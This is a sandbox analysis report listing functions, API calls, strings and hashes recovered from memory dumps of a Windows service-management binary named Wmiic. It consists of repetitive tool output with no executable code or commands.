• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$CreateErrorLastProcess$AllocFreeHandleInformationPipeThread
• String ID: create_logging_thread()$logger
• API String ID: 3682172063-2332508298
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: (none)
• String ID: %c%s$dump$setting_dump_dependon
• API String ID: 0-3641056368
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$Process$AllocErrorFileFreeLastModuleName_snwprintf_s
• String ID: % 8lu %s%s$???$[WOW64]
• API String ID: 2935443209-3245662266
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$ConfigErrorLastProcessQueryService$AllocFree
• String ID: QUERY_SERVICE_CONFIG$query_service_config()
• API String ID: 2921672788-976127789
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: append_to_double_null()$key$newdn
• API String ID: 756756679-3598718664
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: key$newdn$remove_from_double_null()
• API String ID: 756756679-180665911
                                                                                                                                                                                                    • Opcode ID: dec6ef9297f2f528877f7eddd1e9d4dee81437ed94269273f5d5e12274e4d5bc
                                                                                                                                                                                                    • Instruction ID: 8c6053ef598a717a1cf223f2861525f2768c9fab3b540323a4fd1412df3eeb5f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dec6ef9297f2f528877f7eddd1e9d4dee81437ed94269273f5d5e12274e4d5bc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03619D76722A9485E622DF26B8047D9B7E0F749BD4F488219EF59037E8DF38C985C300
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: %c%u
                                                                                                                                                                                                    • API String ID: 0-883269693
                                                                                                                                                                                                    • Opcode ID: d2118b9a9eada75ffb7c5c227ec89a3223c0b64f80d6bc3e61d26a13f3fa7dcd
                                                                                                                                                                                                    • Instruction ID: e75947337f5fd74baf7b6f5cfe7824060c4155299e81c8694041bf6305fe6a32
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2118b9a9eada75ffb7c5c227ec89a3223c0b64f80d6bc3e61d26a13f3fa7dcd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C51D072215AC596E7A1CF26F4483DA73A0F78C7E8F548229EB5957BE8DB38C105CB00
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Event$Source$CloseDeregisterQueryRegisterReportValue_snwprintf_s
                                                                                                                                                                                                    • String ID: %s\%s$AppEvents$hook registry$set_hook()
                                                                                                                                                                                                    • API String ID: 2341694245-1670097391
                                                                                                                                                                                                    • Opcode ID: b442a7b8d74010f362647dca0de7b108b6b00fa7208d0fa25c58233f39fd3f26
                                                                                                                                                                                                    • Instruction ID: 6d0862f9470687456da518464cbe15381b9a51efbdc411d03d7a1f67d58250b0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b442a7b8d74010f362647dca0de7b108b6b00fa7208d0fa25c58233f39fd3f26
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9041B17131468059EB62CB23B891BEA6291B74DBE4F84032ABF6E47BE5DF3CC5459310
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FormatMessageValue$AllocDefaultLangLocalUser_snwprintf_s
                                                                                                                                                                                                    • String ID: <out of memory for error message>$system error %lu
                                                                                                                                                                                                    • API String ID: 2253289489-3923297632
                                                                                                                                                                                                    • Opcode ID: c57cf59de28d07db67d5877a0ca59d18a7d4958fae7d58dbe770bbd656636a06
                                                                                                                                                                                                    • Instruction ID: a577034a7231977c6e80a66ab4d1eee538ee20579c78fea223c5835cb28133ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c57cf59de28d07db67d5877a0ca59d18a7d4958fae7d58dbe770bbd656636a06
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E21327160478186E7229F26F8547A66291FB8C7E8F444238EB99477E4EF3CC8548704
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1012874770-0
                                                                                                                                                                                                    • Opcode ID: a77eea8c151e190d82b6f428cf3663883c0e4f19f30549a310c13090e96925bf
                                                                                                                                                                                                    • Instruction ID: ba48b5ff12f0f3a38f4112c7b4e794e919eaded4b65ab0df7ef7b43739d5b6dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a77eea8c151e190d82b6f428cf3663883c0e4f19f30549a310c13090e96925bf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941083261268486FF579FA3C4557EC23A0AB9EBC4F480535EB1D1F6A5CF7AC8918320
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 0000000140022178
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 000000014002218A
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 00000001400221EA
                                                                                                                                                                                                    • malloc.LIBCMT ref: 0000000140022256
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 00000001400222A0
                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 00000001400222B7
                                                                                                                                                                                                    • free.LIBCMT ref: 00000001400222C8
                                                                                                                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,?,?,?,00000008,00000001400223EA), ref: 0000000140022345
                                                                                                                                                                                                    • free.LIBCMT ref: 0000000140022355
                                                                                                                                                                                                      • Part of subcall function 000000014002463C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 0000000140024692
                                                                                                                                                                                                      • Part of subcall function 000000014002463C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00000001400246B1
                                                                                                                                                                                                      • Part of subcall function 000000014002463C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00000001400247B5
                                                                                                                                                                                                      • Part of subcall function 000000014002463C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 00000001400247F0
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3804003340-0
                                                                                                                                                                                                    • Opcode ID: e91ada0d3418bd2f4ec09be758e20b385c78253fc2d9f4ca109f82a3e7e5caae
                                                                                                                                                                                                    • Instruction ID: d53383f59eec4462090a64fdbba06e0d248b67d1e792285d37ae28196ec31423
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e91ada0d3418bd2f4ec09be758e20b385c78253fc2d9f4ca109f82a3e7e5caae
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A61A4326006809AEB229F66D4407DC77A6F74CBE8F540A29FF1957BE8DB78CD458340
                                                                                                                                                                                                    APIs
Strings
Memory Dump Source
• Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
Similarity
• API ID: Heap$AllocFreeLocalProcess_snwprintf_s_vfwprintf_p
• String ID: %s\%s$NT Service$name$virtual_account
• API String ID: 1628691493-1293189587
APIs
Similarity
• API ID: __doserrno_errno
• String ID:
• API String ID: 921712934-0
Strings
Similarity
• API ID:
• String ID: SERVICE_FILE_SYSTEM_DRIVER$SERVICE_INTERACTIVE_PROCESS$SERVICE_KERNEL_DRIVER$SERVICE_WIN32_OWN_PROCESS$SERVICE_WIN32_SHARE_PROCESS$SERVICE_WIN32_SHARE_PROCESS|SERVICE_INTERACTIVE_PROCESS
• API String ID: 0-2402770260
Strings
Similarity
• API ID:
• String ID: %lu$%s set %s %s %s$%s set %s %s %s %s
• API String ID: 0-1795435707
APIs
Strings
Similarity
• API ID: _getptd$ExceptionRaise
• String ID: csm
• API String ID: 2255768072-1018135373
APIs
• _FF_MSGBANNER.LIBCMT ref: 000000014001A85B
  • Part of subcall function 000000014001DBB8: GetModuleFileNameA.KERNEL32(?,?,?,?,?,000000014001DE14,?,?,?,?,0000000140020721,?,?,00000000,000000014001A304), ref: 000000014001DC7B
  • Part of subcall function 0000000140018E48: ExitProcess.KERNEL32 ref: 0000000140018E57
  • Part of subcall function 000000014001A2E0: malloc.LIBCMT ref: 000000014001A2FF
  • Part of subcall function 000000014001A2E0: Sleep.KERNEL32(?,?,00000000,000000014001A895,?,?,00000000,000000014001A93F,?,?,?,?,?,?,00000000,000000014001C67C), ref: 000000014001A316
• _errno.LIBCMT ref: 000000014001A89D
• _lock.LIBCMT ref: 000000014001A8B1
• free.LIBCMT ref: 000000014001A8D3
• _errno.LIBCMT ref: 000000014001A8D8
• LeaveCriticalSection.KERNEL32(?,?,00000000,000000014001A93F,?,?,?,?,?,?,00000000,000000014001C67C,?,?,00000000,000000014001B8C5), ref: 000000014001A8FE
Similarity
• API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfreemalloc
• String ID:
• API String ID: 1024173049-0
APIs
Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Process$AllocFree_snwprintf_s
                                                                                                                                                                                                    • String ID: value_from_string()
                                                                                                                                                                                                    • API String ID: 734457407-962593079
APIs
Similarity
• API ID: Item$EnableWindow
• String ID:
• API String ID: 1115945535-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Similarity
• API ID: Resource$Find$CreateDefaultDialogErrorIndirectLangLastLoadParamUser
• String ID:
• API String ID: 940021595-0
Strings
Similarity
• API ID:
• String ID: LocalSystem
• API String ID: 0-3718507506
Strings
Similarity
• API ID:
• String ID: %s
• API String ID: 0-620797490
APIs
Strings
Similarity
• API ID: _getptd
• String ID: MOC$csm
• API String ID: 3186804695-1389381023
APIs
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSectionServiceStatus$EnterLeaveUnregisterWait
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 750648178-0
                                                                                                                                                                                                    • Opcode ID: da6eaf891d5f39c178a9daca24e1f4e62401406960aaf2683fab0f1a6af88cc5
                                                                                                                                                                                                    • Instruction ID: 64d843524deb2b9263129e994287159644b8f218d23b3c23ad896588e56a0bad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: da6eaf891d5f39c178a9daca24e1f4e62401406960aaf2683fab0f1a6af88cc5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26519AB6904B86C6E769DB22F4513DBB7A4F3887C8F040215EB9A073A5DB7DD949CB00
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$ByteCharMultiProcessWide$AllocFree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1621643742-0
                                                                                                                                                                                                    • Opcode ID: c6716c944c1ee476e8fa47434dc82bb4148891a779e4bc662eaca591434aa38c
                                                                                                                                                                                                    • Instruction ID: 73261801b5f655ca270de00b92cee958fb11958522fdb0b445105a0a4ffb2315
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6716c944c1ee476e8fa47434dc82bb4148891a779e4bc662eaca591434aa38c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9216235605B8081E7219F67B81079AABE5FB4D7E4F044229EF99477E9DF38C4508600
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                    • Opcode ID: 75444d69a368e4496316f745fd35ff06dd85ac79cfc29b2ce87d2832b74a9499
                                                                                                                                                                                                    • Instruction ID: c44fe957979a91557bf25453a9036a81366d3cea9cc272b65acdfdfda9ee0274
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75444d69a368e4496316f745fd35ff06dd85ac79cfc29b2ce87d2832b74a9499
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19114CB5605A8482EB129B73A8043DA67A1FB8DBD0F444029FF4E47768DF3CC9498A40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Item$HeapText$_snwprintf_s$AllocProcess$FreeLocal
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 65965981-0
                                                                                                                                                                                                    • Opcode ID: 21198b540a65345ed7fdc7f0815551f0124c4edbe3ffc441835e824b3edb693a
                                                                                                                                                                                                    • Instruction ID: 8c88ce8c025d37f4d5b0e8d3153f6582234e056b6c9f906e17911e81f835f57e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21198b540a65345ed7fdc7f0815551f0124c4edbe3ffc441835e824b3edb693a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B11EFB161968182E7619B12F1547EE6311F789BC4F801125FF4E17AA9CF7CC54A8740
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$CallTranslator
                                                                                                                                                                                                    • String ID: MOC
                                                                                                                                                                                                    • API String ID: 3569367362-624257665
                                                                                                                                                                                                    • Opcode ID: 984ef666c86ff0f26ee1dd0a56a556fdf105fcc5e21237e672a10548b4838afa
                                                                                                                                                                                                    • Instruction ID: 1981bdcadb06ce4bdc8508a6749bf47e27913e4d16f9d5307a86893b0f960b5a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 984ef666c86ff0f26ee1dd0a56a556fdf105fcc5e21237e672a10548b4838afa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7861C172204BC096EB21CB16E0807EDB3A1F788BC8F044612FB8E4BAA9DF79C155C700
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888531338.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888574423.0000000140026000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140030000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888606077.0000000140062000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001F.00000002.1888651556.0000000140065000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_140000000_Wmiic.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CreateErrorLastTerminate
                                                                                                                                                                                                    • String ID: h
                                                                                                                                                                                                    • API String ID: 391916801-2439710439
                                                                                                                                                                                                    • Opcode ID: f0eea5fc8340ddcc071df88f9cb943006310234530f1304aabdf6978d6f4de95
                                                                                                                                                                                                    • Instruction ID: d870a3890a1a428991c6d2e8576a3997bb0424cf396cd575bfeec439b2630230
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f0eea5fc8340ddcc071df88f9cb943006310234530f1304aabdf6978d6f4de95
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89116072614AC086DB608B25F44539FB3E5FBC8794F544129A78D87B69EF7CC055CB00
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001F.00000002.1888546922.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true
